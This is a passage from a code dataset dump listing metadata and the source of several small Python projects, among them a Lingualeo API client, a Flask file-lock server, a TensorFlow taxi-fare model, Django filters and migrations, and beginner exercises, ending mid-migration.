blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1d1ed5e5d5c7e1e261072abdc86f3a3ae34c7bb1
|
df976d2717f81ae450e7604a072888e5a8406681
|
/english/components/helpers/Lingualeo/service.py
|
247f10d19922fff14e46d81d5dd79fca99fdd2f6
|
[] |
no_license
|
andrey-ladygin-loudclear/pyhelper
|
3bddfab247a063040c945a9556c40d7f4f5ad25e
|
ad4d36cd9971ed6c8cfda4a8e6626a532cf28f51
|
refs/heads/master
| 2021-04-28T09:48:30.802463
| 2018-02-19T11:13:18
| 2018-02-19T11:13:18
| 122,050,536
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,394
|
py
|
import urllib
import urllib2
import json
from cookielib import CookieJar
class Lingualeo:
def __init__(self, email, password):
self.email = email
self.password = password
self.cj = CookieJar()
def auth(self):
url = "http://api.lingualeo.com/api/login"
values = {
"email": self.email,
"password": self.password
}
return self.get_content(url, values)
def add_word(self, word, tword, context):
url = "http://api.lingualeo.com/addword"
values = {
"word": word,
"tword": tword,
"context": context,
}
self.get_content(url, values)
def get_translates(self, word):
url = "http://api.lingualeo.com/gettranslates?word=" + urllib.quote_plus(word)
try:
result = self.get_content(url, {})
translate = result["translate"][0]
return {
"is_exist": translate["is_user"],
"word": word,
"tword": translate["value"].encode("utf-8")
}
except Exception as e:
return e.message
def get_content(self, url, values):
data = urllib.urlencode(values)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
req = opener.open(url, data)
return json.loads(req.read())
|
[
"andrey@gmail.com"
] |
andrey@gmail.com
|
8d1f72263bb65e91c6157f313d579fcb11c7bc71
|
3fa81f1a8328bc1b4290d0a6ed20d737eefd416f
|
/LESSON_4/hw_7_lesson_4.py
|
00bddf038c8f2a9923e7a8c54519a189e726754c
|
[] |
no_license
|
EvgeniiGrigorev0/home_work-_for_lesson_2
|
86a0942b638bed0691ae34d93dc9fec1febca269
|
55d54af21d3bef237993a21bd1f5803198596de8
|
refs/heads/main
| 2023-03-08T16:51:38.626838
| 2021-02-16T10:15:20
| 2021-02-16T10:15:20
| 331,285,530
| 0
| 0
| null | 2021-02-16T10:15:22
| 2021-01-20T11:27:17
|
Python
|
UTF-8
|
Python
| false
| false
| 947
|
py
|
# 7. Реализовать генератор с помощью функции
# с ключевым словом yield, создающим очередное
# значение. При вызове функции должен создаваться
# объект-генератор. Функция должна вызываться
# следующим образом: for el in fact(n). Функция
# отвечает за получение факториала числа, а в цикле
# необходимо выводить только первые n чисел, начиная с 1! и до n!.
from itertools import count
from math import factorial
num = int(input('Введите до какого числа вам нужен факториал: '))
def fact():
for el in count(1):
yield factorial(el)
fact = fact()
x = 0
for i in fact:
if x < num:
print(i)
x += 1
else:
break
|
[
"vllljacksonlllv@gmail.com"
] |
vllljacksonlllv@gmail.com
|
9d45a3627adcd5fafdac9dfc0c4659ab89a4240b
|
cec3c2f5b67f018384c16d308a3f4ad5d3ba93af
|
/hr/filters.py
|
30dc039d0e33be3182bc6bd416b19fe23b134f4a
|
[] |
no_license
|
levenkoevgeny/amia_social
|
37bddd59c194bb1714b82b7de32982469db87723
|
32ed973e56440b90757ae2e5c52143fa3f9c7ed1
|
refs/heads/main
| 2023-08-14T05:55:25.432038
| 2021-09-27T18:54:36
| 2021-09-27T18:54:36
| 309,278,233
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,519
|
py
|
import django_filters
from institution.models import Institution, Vacancy
from social_profile.models import SocialProfile, Language, Skill
LEVELS = (
(1, 'Beginner'),
(2, 'Pre-Intermediate'),
(3, 'Intermediate'),
(4, 'Upper-Intermediate'),
(5, 'Advanced'),
(6, 'Proficiency'),
)
class VacancyFilter(django_filters.FilterSet):
institution = django_filters.ModelMultipleChoiceFilter(queryset=Institution.objects.all())
skills = django_filters.ModelMultipleChoiceFilter(queryset=Skill.objects.all())
language = django_filters.ModelChoiceFilter(field_name='languagewithlevelvacancy__language',
queryset=Language.objects.all())
language_level = django_filters.ChoiceFilter(field_name='languagewithlevelvacancy__level',
choices=LEVELS)
class Meta:
model = Vacancy
fields = [
'skills',
]
class ProfileFilter(django_filters.FilterSet):
skills = django_filters.ModelMultipleChoiceFilter(queryset=Skill.objects.all())
language = django_filters.ModelChoiceFilter(field_name='languagewithlevel__language',
queryset=Language.objects.all())
language_level = django_filters.ChoiceFilter(field_name='languagewithlevel__level',
choices=LEVELS)
class Meta:
model = SocialProfile
fields = [
'skills',
]
|
[
"levenko.evgeny@yandex.by"
] |
levenko.evgeny@yandex.by
|
518283948377e77df23160ba4af13072e741f671
|
ed294013f059de740560fc8228dcf39133adb659
|
/Phyton Sample Codes/20180113-Hipotenus.py
|
93dec59b07ef73df3cced1bb4aaaccec1c7e05ad
|
[] |
no_license
|
thegentdev/Python
|
382154cddcba8b71c153b515ae02f8ced0f12e2c
|
8bdeae285db4960e3356c5fdbbc482f36cb61c14
|
refs/heads/master
| 2021-09-05T17:00:09.233698
| 2018-01-29T20:30:39
| 2018-01-29T20:30:39
| 113,296,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,606
|
py
|
# 2 dik kenarı verilen üçgenin hipotenüsünü bulan program.
#BayMFE
import math
import sys
kontrol=True
###################################################################################################
def dikKenarAl():
d1 = int(0)
d2 = int(0)
try:
d1 = int(input("Lütfen 1.dik kenar uzunluğunu giriniz: "))
d2 = int(input("Lütfen 2.dik kenar uzunluğunu giriniz: "))
except ValueError:
print("Lütfen sadece sayı giriniz.\n")
d1 = int(0)
d2 = int(0)
Hipotenus()
except ZeroDivisionError:
print("Lütfen sıfırdan farklı bir değer giriniz.\n")
Hipotenus()
except UnboundLocalError:
print("Bir hata oluştu tekrar deneyiniz.\n")
Hipotenus()
return d1,d2
def Tekrar():
a = str(input("Yeniden denemek istiyorsanız (Y), Programı sonlandırmak için (S) tuşlayınız: "))
if a == ("y"):
kontrol = True
elif a == ("Y"):
kontrol = True
elif a == ("S"):
Cıkıs()
elif a == ("s"):
Cıkıs()
else:
print("Yanlış giriş yaptınız.\nTekrar giriniz")
a = str("z")
Tekrar()
def Hipotenus():
dikkenarlar = []
dikkenarlar.append(dikKenarAl())
hipotenus = math.sqrt(((dikkenarlar[0][0]) ** 2) + ((dikkenarlar[0][1]) ** 2))
if hipotenus != int(0):
print(hipotenus)
###################################################################################################
print("Hipotenüs hesaplama programına hoşgeldiniz.\n\n")
while kontrol == True:
Hipotenus()
Tekrar()
|
[
"34301812+bayMFE@users.noreply.github.com"
] |
34301812+bayMFE@users.noreply.github.com
|
70a47262417eb8338e700cb3dffe2d3c6f5780f9
|
9168edc2a50f75ef848fb44ec6203ef12f9b59b0
|
/lock_server.py
|
da75b8f5d4ec9d87079022d470842b8bcf498e1c
|
[] |
no_license
|
Anubhavj02/DistributedFileSystem
|
9b0c6e38f7934ce6fec82af942a389eaca084d7d
|
f110d08c8a63fa7b69e26a691d477464cd157ae8
|
refs/heads/master
| 2021-05-06T15:17:01.984729
| 2017-12-15T23:46:48
| 2017-12-15T23:46:48
| 113,508,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,210
|
py
|
import argparse
from flask import Flask
from flask import request
from flask import jsonify
import server_messages_list
app = Flask(__name__)
@app.route('/lock_server/getLockStatus', methods=['GET'])
def get_file_lock_status():
"""function to get the status of the file lock
"""
file_path = request.args.get('file_path')
client_id = request.args.get('user_id')
file_locked = lock_server.check_file_locked(file_path, client_id)
response_data = {'file_locked': file_locked}
response = jsonify(response_data)
response.status_code = 200
return response
@app.route('/lock_server/lockFile', methods=['POST'])
def put_file_lock():
"""function to put the lock on the file
"""
if request.headers['Content-Type'] == 'application/json':
data = request.json
file_path = data['file_path']
lock_file = data['lock_file']
user_id = data['user_id']
# If file not locked, lock it
if lock_file:
file_status = lock_server.put_file_lock(file_path, user_id)
# Unlock it if locked
else:
file_status = lock_server.file_unlocker(file_path, user_id)
response_data = {'file_lock_status': file_status}
response = jsonify(response_data)
response.status_code = 200
return response
# Class for handling all the lock operations
class LockServer:
def __init__(self, server_host, server_port):
self.host_addr = "http://"+server_host+":"+str(server_port)+"/"
self.host = server_host
self.port = server_port
self.locked_files_list = {}
def put_file_lock(self, file_path, user_id):
"""function to put lock on the file
Args:
file_path: path of the file to be locked
user_id: user Id working on locked file
"""
# If file in locked in list put the details
if file_path not in self.locked_files_list:
self.locked_files_list[file_path] = [user_id]
return True
# If file is in the list append the user to the file
elif user_id not in self.locked_files_list[file_path]:
self.locked_files_list[file_path].append(user_id)
return True
else:
return False
def file_unlocker(self, file_path, user_id):
"""function to unlock the file
Args:
file_path: path of the file to be locked
user_id: user Id working on locked file
"""
# If file not locked file list raise error
if file_path not in self.locked_files_list:
raise Exception(server_messages_list.FILE_UNLOCKING)
# Delete the user from the list and delete the file from lock list
elif self.locked_files_list[file_path] != [] and user_id == self.locked_files_list[file_path][0]:
del self.locked_files_list[file_path][0]
return True
else:
return True
def check_file_locked(self, path, user_id):
"""function to unlock the file
Args:
path: path of the file to be locked
user_id: user Id working on locked file
"""
# Iterate through all the locked file list
for file_path, value in self.locked_files_list.items():
if file_path == path and self.locked_files_list[file_path] != []:
if self.locked_files_list[file_path][0] == user_id:
return False
else:
return True
return False
if __name__ == '__main__':
args_parser = argparse.ArgumentParser()
args_parser.add_argument(
'--server_host',
type=str,
default='127.0.0.1',
help='IP of server where it is hosted'
)
args_parser.add_argument(
'--server_port',
type=int,
default=8004,
help='port of the server'
)
ARGS, unparsed = args_parser.parse_known_args()
lock_server = LockServer(ARGS.server_host, ARGS.server_port)
app.run(host=ARGS.server_host, port=ARGS.server_port)
|
[
"jainan@tcd.ie"
] |
jainan@tcd.ie
|
9687b8061923b77a640b2858b548b5c5094f9dbf
|
7016b8056c81f5c2d5b1a5c252b091a51a82a8a5
|
/python/sikher_splash.py
|
09f21e7a91a0b8faf8c0e4e5e114793777d39379
|
[] |
no_license
|
sikher/sikher-gurbani-searcher
|
8d649b9247fdf5a7730c7eb6103b8904dfdaa539
|
2dca582a0cac63c3b77a02ea69f51caeeaaec2ff
|
refs/heads/master
| 2016-09-02T04:46:55.360823
| 2015-03-13T21:07:01
| 2015-03-13T21:07:01
| 32,145,402
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,245
|
py
|
# -*- coding: utf8 -*-
# Module: sikher_splash.py
# Purpose: to show a splash screen on startup
# Created: Jasdeep Singh 24/09/2005
# To Do: Add Code to Show What's Loading
# Place this status text in bottom right of splash screen
import wx
try:
import psyco
psyco.profile()
except:
print 'Psyco not found, ignoring it'
class MySplashScreen(wx.SplashScreen):
"""
Create a splash screen widget.
"""
def __init__(self):
# This is a recipe to a the screen.
# Modify the following variables as necessary.
aBitmap = wx.Image(name = "SplashScreen.png").ConvertToBitmap()
splashStyle = wx.SPLASH_CENTRE_ON_SCREEN | wx.SPLASH_TIMEOUT
splashDuration = 3000 # milliseconds
splashCallback = None
# Call the constructor with the above arguments in exactly the
# following order.
wx.SplashScreen.__init__(self, aBitmap, splashStyle,
splashDuration, splashCallback)
self.Bind(wx.EVT_CLOSE, self.OnExit)
wx.Yield()
def OnLoading(self):
pass
def OnExit(self, evt):
self.Hide()
evt.Skip()
if __name__ == '__main__':
pass
|
[
"jasdeep@simplyspiritdesign.com"
] |
jasdeep@simplyspiritdesign.com
|
196d0fac47d59e2fb1d63ec31d2ed35843ac5a5f
|
ec930ed441f433e4043c99f1fe8423ac52fccefb
|
/passwordretry.py
|
608ef8cc2e2cca8311d0ce17448d88ec087bc58c
|
[] |
no_license
|
mickeywangweb/passwordretry
|
1fee7150cda879cf48fa59ccdb7fdf911f404e41
|
0ffe22353c02b7750db2f4891708b1b651095d78
|
refs/heads/master
| 2022-12-17T23:13:21.525898
| 2020-09-19T04:30:45
| 2020-09-19T04:30:45
| 296,782,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 519
|
py
|
# 密碼重試程式
# 先在程式碼中 設定好密碼 password = 'A123456'
# 讓使用者(最多輸入三次密碼)= while
# 如果輸入正確 就印出"登入成功"
# 如果不正確 就印出 "密碼錯誤!還有_次機會"
password = 'a123456'
i = 3 # 剩餘機會
while i > 0:
pwd = input('請輸入密碼')
if pwd == password:
print('登入成功!')
break # 逃出迴圈
else:
i = i - 1
print('密碼錯誤!')
if i > 0:
print ('還有' , i, '次機會')
else:
print('鎖帳號')
|
[
"a0958062058@gmail.com"
] |
a0958062058@gmail.com
|
079b30c78df9dd50284154e930503a009f9f941b
|
69210707f3d8c0cca93c62e5760f3b004e8b394a
|
/03.Intro_To_TensorFlow/Week_3/01.Qwiklabs_Scaling_TensorFlow_With_Cloud_AI_Platform/taxifare/trainer/model.py
|
e08eadced6f3eec1c14f8913b4f6f795c6aa1348
|
[] |
no_license
|
mujahid7292/ML_With_TensorFlow_On_GCP
|
b22285463ffabbe201f3c494ddb6b0040827f1ac
|
713a588cf8ee05dcb06ace6659953afd1079fe87
|
refs/heads/master
| 2023-04-08T09:28:06.103151
| 2020-11-19T06:17:13
| 2020-11-19T06:17:13
| 244,292,498
| 1
| 0
| null | 2023-03-25T00:11:58
| 2020-03-02T05:59:59
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,902
|
py
|
#!/usr/bin/env python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import shutil
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
# List the CSV columns
CSV_COLUMNS = [
'fare_amount',
'pickuplon',
'pickuplat',
'dropofflon',
'dropofflat',
'passengers',
'key'
]
#Choose which column is your label
LABEL_COLUMN = 'fare_amount'
# Set the default values for each CSV column in case there is a missing value
DEFAULTS = [[0.0], [-74.0], [40.0], [-74.0], [40.7], [1.0], ['nokey']]
# Create an input function that stores your data into a dataset
def read_dataset(filename, mode, batch_size = 512):
def _input_fn():
def decode_csv(value_column):
columns = tf.compat.v1.decode_csv(value_column, record_defaults = DEFAULTS)
features = dict(zip(CSV_COLUMNS, columns))
label = features.pop(LABEL_COLUMN)
return features, label
# keys_to_features = {
# 'label': tf.compat.v1.FixedLenFeature((), dtype=tf.int64),
# 'features': tf.compat.v1.FixedLenFeature(shape=(7,), dtype=tf.float32),
# }
# parsed = tf.compat.v1.parse_single_example(value_column, keys_to_features)
# my_features = {}
# for idx, names in enumerate(CSV_COLUMNS):
# my_features[names] = parsed['features'][idx]
#return my_features, parsed['label']
# Create list of files that match pattern
file_list = tf.compat.v1.gfile.Glob(filename)
# Create dataset from file list
dataset = tf.data.TextLineDataset(file_list).map(decode_csv)
if mode == tf.estimator.ModeKeys.TRAIN:
num_epochs = None # indefinitely
dataset = dataset.shuffle(buffer_size = 10 * batch_size)
else:
num_epochs = 1 # end-of-input after this
dataset = dataset.repeat(num_epochs).batch(batch_size)
return tf.compat.v1.data.make_one_shot_iterator(dataset=dataset)
return _input_fn
# Define your feature columns
INPUT_COLUMNS = [
tf.feature_column.numeric_column('pickuplon'),
tf.feature_column.numeric_column('pickuplat'),
tf.feature_column.numeric_column('dropofflat'),
tf.feature_column.numeric_column('dropofflon'),
tf.feature_column.numeric_column('passengers')
]
# Create a function that will augment your feature set
def add_more_features(feats):
# Nothing to add (yet!)
return feats
feature_cols = add_more_features(INPUT_COLUMNS)
# Create your serving input function so that your trained model will be able to serve predictions
def serving_input_fn():
feature_placeholders = {
column.name: tf.compat.v1.placeholder(tf.float32, [None]) for column in INPUT_COLUMNS
}
features = feature_placeholders
return tf.estimator.export.ServingInputReceiver(features, feature_placeholders)
# Create an estimator that we are going to train and evaluate
def train_and_evaluate(args):
tf.compat.v1.summary.FileWriterCache.clear() # ensure filewriter cache is clear for TensorBoard events file
estimator = tf.estimator.DNNRegressor(
model_dir = args['output_dir'],
feature_columns = feature_cols,
hidden_units = args['hidden_units'])
train_spec = tf.estimator.TrainSpec(
input_fn = read_dataset(args['train_data_paths'],
batch_size = args['train_batch_size'],
mode = tf.estimator.ModeKeys.TRAIN),
max_steps = args['train_steps'])
exporter = tf.estimator.LatestExporter('exporter', serving_input_fn)
eval_spec = tf.estimator.EvalSpec(
input_fn = read_dataset(args['eval_data_paths'],
batch_size = 10000,
mode = tf.estimator.ModeKeys.EVAL),
steps = None,
start_delay_secs = args['eval_delay_secs'],
throttle_secs = args['throttle_secs'],
exporters = exporter)
tf.estimator.train_and_evaluate(estimator, train_spec, eval_spec)
|
[
"mujahid7292@gmail.com"
] |
mujahid7292@gmail.com
|
679060941e13f1994c2a6668adbc6846b0629918
|
da5ae2fa857fd08a565a10a2858e50fc58a06eda
|
/test/hhhh.py
|
67440849807640590c2ec719e44b970788014e18
|
[] |
no_license
|
sandengjiubanv/Python_OldBoy
|
51b1488673e7e3220fd429023f4a5441a6d6b0be
|
c91636a8befe0b7843fc3f104f6e4edbd85696a4
|
refs/heads/master
| 2020-04-11T07:29:48.679959
| 2019-01-03T09:23:08
| 2019-01-03T09:23:08
| 161,611,954
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,800
|
py
|
# -*- coding: utf-8 -*-
import os
path1 = input("请输入目录(默认当前目录): ")
f = open('tmp.txt', 'w')
if path1 == "":
print("默认使用当前目录")
path1 = os.getcwd()
os.chdir(path1)
print("当前目录为 : ", os.getcwd())
list1 = os.listdir()
print("当前目录下有文件夹:")
for i in list1:
path_file = os.getcwd() + "/" + str(i)
# print(path_file)
if os.path.isdir(path_file):
print(i)
f.write(i + '\n')
else:
os.chdir(path1)
print("当前目录为 : ", os.getcwd())
list1 = os.listdir()
print("当前目录下有文件夹:")
for i in list1:
path_file = os.getcwd() + "/" + str(i)
# print(path_file)
if os.path.isdir(path_file):
print(i)
f.write(i + '\n')
f.close()
# -*- coding: utf-8 -*-
# import os,sys
#
# def file_name(file_dir):
# for root, dirs, files in os.walk(file_dir):
# print(root) #当前目录路径
# print(dirs) #当前路径下所有子目录
# print(files) #当前路径下所有非目录子文件
#
# path = "/Users/erlong/OneDrive/PycharmProjects/s9/test/"
#
# # -*- coding: utf-8 -*-
# import os, sys
# # reload(sys)
# # sys.setdefaultencoding('utf-8')
# def all_path(dirname):
# print(os.walk(dirname))
# for maindir, subdir, file_name_list in os.walk(dirname):
# for filename in file_name_list:
# print(filename)
# path = "/Users/erlong/OneDrive/PycharmProjects/s9/test/"
#
# # path="F:/项目文档/项目结算交付件/03&04&05/v1.0/审计材料/16、数据提取脚本执行/方案&脚本"
# # path="F:/项目文档/项目结算交付件/03&04&05/v1.0/审计材料16、数据提取脚本执行/tmp/"
# # all_path(path.decode('utf-8'))
#
|
[
"1611269762@qq.com"
] |
1611269762@qq.com
|
eb3ab63e64a653a8aea2f4e1b19ccec297ec586b
|
37e64df1e2c5a1c1af9b11f3050c9117dd9dcd31
|
/API-IRIS-DjangoRestFramework/iris/iris_project/admin.py
|
3396760b50a4f956e78548495ece1e7f633924d5
|
[] |
no_license
|
Daniel-Santos9/Modulo6-Trainee-Lapisco
|
d289718e3cb4010d9932d7639dc45fab51b91066
|
dcff6ca4da4b767754f43358ac0cf27007f4172e
|
refs/heads/main
| 2023-01-05T23:21:32.529169
| 2020-11-04T19:29:31
| 2020-11-04T19:29:31
| 304,893,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
from django.contrib import admin
from .models import Iris
# Register your models here.
admin.site.register(Iris)
|
[
"daniel.ifce2@gmail.com"
] |
daniel.ifce2@gmail.com
|
a5e1caf08b0997a65f17e398f67b4dd75b35c285
|
1d4402fbc8d17191f5818815ce43e9b1eadc7a79
|
/backend/medhistorysite/patient_ill_history/migrations/0001_initial.py
|
aae93e5ff4f79a1bec14718e704fdbdccba48bbf
|
[] |
no_license
|
Lika787/DiplomaProject
|
7df8c9e706b0aa3af834dad864bcefd16f09577c
|
6a93d8e2d9493186f2295518db02075b5acd8454
|
refs/heads/master
| 2023-04-29T11:21:43.757545
| 2021-05-17T13:10:27
| 2021-05-17T13:10:27
| 331,763,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,924
|
py
|
# Generated by Django 3.1.7 on 2021-03-07 12:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('country', models.CharField(max_length=100)),
('region', models.CharField(max_length=100)),
('cityVillage', models.CharField(max_length=100)),
('street', models.CharField(max_length=100)),
('houseDetails', models.CharField(max_length=40)),
],
),
migrations.CreateModel(
name='CatalogMeasurement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nameMeasurement', models.CharField(max_length=100)),
('unitMeasurement', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='ElectroUltrasoundTherapy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nameEus', models.CharField(max_length=60)),
('valueEus', models.FloatField()),
('unitEus', models.CharField(max_length=20)),
('dateEus', models.DateTimeField()),
],
),
migrations.CreateModel(
name='LabMedicalStaff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='MedicalStaff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('surname', models.CharField(max_length=100)),
('name', models.CharField(max_length=200)),
('patronymic', models.CharField(max_length=100)),
('position', models.CharField(choices=[('doctor', 'doctor'), ('nurse', 'nurse'), ('laboratory assistant', 'laboratory assistant'), ('medical assistant', 'medical assistant')], max_length=22)),
('specialization', models.CharField(max_length=100)),
('startWork', models.DateField()),
('phone', models.CharField(max_length=30)),
],
options={
'unique_together': {('name', 'surname', 'specialization')},
},
),
migrations.CreateModel(
name='NationCl025',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codeIll', models.CharField(max_length=30)),
('nameIll', models.CharField(max_length=70)),
],
),
migrations.CreateModel(
name='NationCl026',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codeIntervention', models.CharField(max_length=30)),
('nameIntervention', models.CharField(max_length=70)),
],
),
migrations.CreateModel(
name='NationCl027',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codeTest', models.CharField(max_length=30)),
('nameTest', models.CharField(max_length=70)),
],
),
migrations.CreateModel(
name='NationClPill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('codePill', models.CharField(max_length=100)),
('namePill', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Patient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('surname', models.CharField(max_length=100)),
('name', models.CharField(max_length=200)),
('patronymic', models.CharField(max_length=100)),
('dateBirth', models.DateField(help_text='YYYY-MM-DD')),
('gender', models.CharField(choices=[('man', 'man'), ('woman', 'woman')], max_length=7)),
('bloodType', models.CharField(choices=[('O(I) Rh-', 'O(I) Rh-'), ('O(I) Rh+', 'O(I) Rh+'), ('A(II) Rh+', 'A(II) Rh+'), ('A(II) Rh-', 'A(II) Rh-'), ('B(III) Rh+', 'B(III) Rh+'), ('AB(IV) Rh+', 'AB(IV) Rh+'), ('AB(IV) Rh-', 'AB(IV) Rh-')], max_length=12)),
('phone', models.CharField(max_length=30)),
('email', models.EmailField(max_length=254)),
('socialStatus', models.CharField(max_length=80)),
('maritalStatus', models.CharField(max_length=50)),
('idAddress', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.address')),
],
),
migrations.CreateModel(
name='Physiotherapy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('namePhysiotherapy', models.CharField(max_length=60)),
('valuePhysiotherapy', models.FloatField()),
('unitPhysiotherapy', models.CharField(max_length=20)),
('datePhysiotherapy', models.DateTimeField()),
],
),
migrations.CreateModel(
name='StageOfTreatment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('stageName', models.CharField(max_length=100)),
('startStage', models.DateTimeField()),
('endStage', models.DateTimeField(blank=True)),
],
),
migrations.CreateModel(
name='Surgery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('DateIntervention', models.DateTimeField()),
],
),
migrations.CreateModel(
name='TreatmentSession',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('startSession', models.DateTimeField()),
('endSession', models.DateTimeField(blank=True)),
('idDoctor', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='treatment_session', to='patient_ill_history.medicalstaff')),
('idMainIll', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl025')),
('idPatient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='treatment_session', to='patient_ill_history.patient')),
],
options={
'unique_together': {('startSession', 'endSession')},
},
),
migrations.CreateModel(
name='SurgeryMedicalStaff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('medicalStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
('surgery', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='sur_med_staff', to='patient_ill_history.surgery')),
],
),
migrations.AddField(
model_name='surgery',
name='idMedStaff',
field=models.ManyToManyField(through='patient_ill_history.SurgeryMedicalStaff', to='patient_ill_history.MedicalStaff'),
),
migrations.AddField(
model_name='surgery',
name='idNameIntervention',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl026'),
),
migrations.AddField(
model_name='surgery',
name='idStage',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='surgery', to='patient_ill_history.stageoftreatment'),
),
migrations.CreateModel(
name='State',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('idStage', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='state', to='patient_ill_history.stageoftreatment')),
],
),
migrations.AddField(
model_name='stageoftreatment',
name='idSession',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stage_of_treatment', to='patient_ill_history.treatmentsession'),
),
migrations.CreateModel(
name='PhysiotherapyMedicalStaff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('medicalStaff', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.medicalstaff')),
('physiotherapy', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physiotherapy_med_staff', to='patient_ill_history.physiotherapy')),
],
),
migrations.AddField(
model_name='physiotherapy',
name='idMedStaff',
field=models.ManyToManyField(through='patient_ill_history.PhysiotherapyMedicalStaff', to='patient_ill_history.MedicalStaff'),
),
migrations.AddField(
model_name='physiotherapy',
name='idStage',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='physiotherapy', to='patient_ill_history.stageoftreatment'),
),
migrations.CreateModel(
name='LaboratoryTest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('valueTest', models.FloatField()),
('unitTest', models.CharField(max_length=20)),
('dateTest', models.DateTimeField()),
('laboratoryName', models.CharField(max_length=150)),
('idMedStaff', models.ManyToManyField(through='patient_ill_history.LabMedicalStaff', to='patient_ill_history.MedicalStaff')),
('idState', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='laboratory_test', to='patient_ill_history.state')),
('nameTest', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='patient_ill_history.nationcl027')),
],
options={
'unique_together': {('valueTest', 'unitTest', 'dateTest', 'laboratoryName')},
},
),
migrations.AddField(
model_name='labmedicalstaff',
name='laboratoryTest',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='lab_staff', to='patient_ill_history.laboratorytest'),
),
migrations.AddField(
model_name='labmedicalstaff',
name='medicalStaff',
